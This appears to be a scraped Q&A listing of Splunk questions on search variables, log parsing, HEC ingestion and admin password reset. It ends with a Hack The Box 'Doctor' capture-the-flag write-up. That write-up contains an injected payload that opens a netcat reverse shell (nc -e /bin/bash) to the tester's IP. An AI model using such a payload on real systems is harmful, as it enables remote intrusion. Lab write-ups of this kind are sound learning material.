splunk

Assign a value to the variable in Splunk and use that value in the search

青春壹個敷衍的年華 submitted on 2021-02-19 06:34:10
Question: I have a use-case where I want to set the value of a variable based on a condition and use that variable in the search command. Example: I want to check the condition if account_no=818 then var1="vpc-06b" else var1="*". I tried ...|eval val1=case(acc_no==818,"vpc-06b",acc_no!=818,"*")|search vpc_id=val1 but I am not getting any event. If I try ...|search vpc_id=vpc-06b then, as a result, I am getting the expected output. Answer 1: index=... (acc-number=818 AND (vpc_id="vpc-078" OR vpc_id=

Splunk Custom Log format Parsing

若如初见. submitted on 2021-02-11 18:00:22
Question: My splunk log format has key value pairs, but one key has caller details which are neither in JSON nor in XML format. It is some internal format for records. JSON logs I can parse with spath, but is there any way I can parse custom formats? For example, my logs are in the following format: Key1=value1 | Key2=value2 | key3=({intern_key1=value1; inern_key2=value2; intern_key3=value3}; {intern_key1=value1; inern_key2=value2; intern_key3=value3}; {intern_key1=value1; inern_key2=value2; intern_key3

Query for calculating duration between two different logs in Splunk

≯℡__Kan透↙ submitted on 2021-02-08 08:42:12
Question: As part of my requirements, I have to calculate the duration between two different logs using a Splunk query. For example: Log 2: 2020-04-22 13:12 ADD request received ID : 123 Log 1 : 2020-04-22 12:12 REMOVE request received ID : 122 The common string between the two logs is " request received ID :" and the unique strings between the two logs are "ADD" and "REMOVE". The expected output duration is 1 hour. Any help would be appreciated. Thanks. Answer 1: You can use the transaction command, https://docs.splunk

How do I send JSON files to Splunk Enterprise from JAVA?

余生长醉 submitted on 2021-02-07 10:58:55
Question: I start by saying I'm a beginner. I'm setting up a system where I collect some JSON files, I parse them in JAVA (Spring Batch), and the part where I'm stuck is sending these files to the HTTP Event Collector (HEC) in Splunk Enterprise. I tried crawling the web for some beginner-friendly guides but I couldn't find anything. I want to send a POST to Splunk Enterprise with said files, so I can index them after they've been sent. So far I could only connect to localhost:8089 like this:

1:1 call PHP from Python

半城伤御伤魂 submitted on 2021-02-05 11:23:14
Question: We're using Splunk (a tool to analyse machine data like log files) and have an application in PHP. For some data we need to make a call to our application in PHP (CLI-based). Unfortunately Splunk only supports Python calls. Is there an easy way to 1:1 "forward/call" PHP with the same arguments and return the output, like a "passthru"? I've found only parts of the solution with the so-called subprocess module, but my Python experience is zero, so I can't get it to work. For example, Splunk calls:

How can I provide metrics to Splunk via HTTP?

半城伤御伤魂 submitted on 2021-01-29 10:30:40
Question: I have been reading through the Splunk Enterprise documentation and it appears I can provide metrics in JSON format over HTTP/HTTPS: https://docs.splunk.com/Documentation/Splunk/8.1.1/Metrics/GetMetricsInOther#Get_metrics_in_from_clients_over_HTTP_or_HTTPS However, I can't see a reference for what exactly this JSON format looks like, beyond one example. I'm also not clear from the docs whether Splunk can be configured to poll this endpoint on my process, or whether I must push the data to Splunk. Answer 1: Splunk's

splunk admin password [closed]

自闭症网瘾萝莉.ら submitted on 2021-01-27 14:58:04
Question: Closed. This question is off-topic. It is not currently accepting answers. Closed 7 years ago. How do I reset the splunk admin password? I guess I need access to the file system that Splunk is running on in order to modify the password file. It does not use a database, so do I need to change a file/variable? Answer 1: If you forgot your admin password you will need access to the file system

HTB Doctor

只愿长相守 submitted on 2021-01-24 10:32:11
HTB Doctor (Easy) URL: https://www.hackthebox.eu/home/machines/profile/278 Basic information: before the penetration test can start, HTB must be connected to Kali; only once the connection is established can the test proceed. 1. Information gathering: the target address is 10.10.10.209. Scan the target with nmap: nmap -sC -sV -sT -O -A 10.10.10.209 Three ports are open: 22, 80 and 8089; the service on 8089 is splunk. 2. Visiting port 80: a hosts entry has to be added before the rest of the content can be accessed. 3. Visiting doctors.htb: vim hosts 10.10.10.209 doctors.htb After entering the page, a universal login password was tried, but it failed. Registered a user and logged in to see whether there was any exploitable information; found that an XSS vulnerability may exist, and XSS code can be constructed to obtain a reverse shell: < img src = http : / / 10.10 .14 .3 / $ ( nc . traditional$ IFS - e$ IFS / bin / bash$ IFS '10.10.14.3' $ IFS '1234' ) > The reverse shell came back successfully; obtain an interactive shell: python3 -c 'import pty;pty.spawn("/bin/bash")' Then go into the home directory to check whether there is any useful information.